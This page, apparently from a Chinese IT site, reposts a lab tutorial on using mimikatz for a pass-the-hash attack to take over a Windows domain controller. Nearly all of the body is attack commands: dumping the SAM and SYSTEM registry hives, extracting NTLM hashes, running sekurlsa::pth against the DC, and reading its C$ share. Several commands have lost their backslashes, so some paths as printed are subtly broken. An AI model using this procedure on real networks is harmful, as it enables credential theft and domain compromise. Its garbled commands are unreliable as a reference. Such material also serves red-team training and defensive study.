栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 前沿技术 > 大数据 > 大数据系统

mimikatz hash传递--获取域控权限

mimikatz hash传递--获取域控权限

mimikatz hash传递–获取域控权限 实验环境
实验环境:win_server2012 ip:192.168.3.132 (域内普通用户,有本地管理员权限,但不知明文密码)
win_server2008 ip:192.168.3.133 (DC域控,与server2012管理员密码相同,但不知明文密码)
此时,你已经拿下了域内一普通用户win_server2012
实验步骤

1,将mimikatz上传至win_server2012;
2,cd 至mimikatz目录;
3,使用reg命令,将注册表中HKLM下的 SAM与 SYSTEM键值导出保存至 sam.hive和 system.hive

reg save hklmsam sam.hive
reg save hklmsystem system.hive

4,使用mimikatz读取 .hive 注册表文件,以获取本地用户的NTLM hash值;

.mimikatz "lsadump::sam /system:system.hive /sam:sam.hive" exit

5,使用mimikatz进行hash传递攻击:

.mimikatz
sekurlsa:pth /user:目标机器用户名 /domain:目标机器IP /ntlm:本地获取的NTLM hash值
例如:sekurlsa::pth /user:administrator /domain:192.168.3.133 /ntlm:afff........

6,攻击成功后,会弹出一个cmd.exe,此时,可以去win2008(DC)的C盘创建一个1.txt,内容为hello world,
回到win2012,进行验证:

1,读取win2008的 C盘以及1.txt内容,注意读取方式
dir \192.168.3.133C$
type \192.168.3.133C$1.txt

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/336208.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号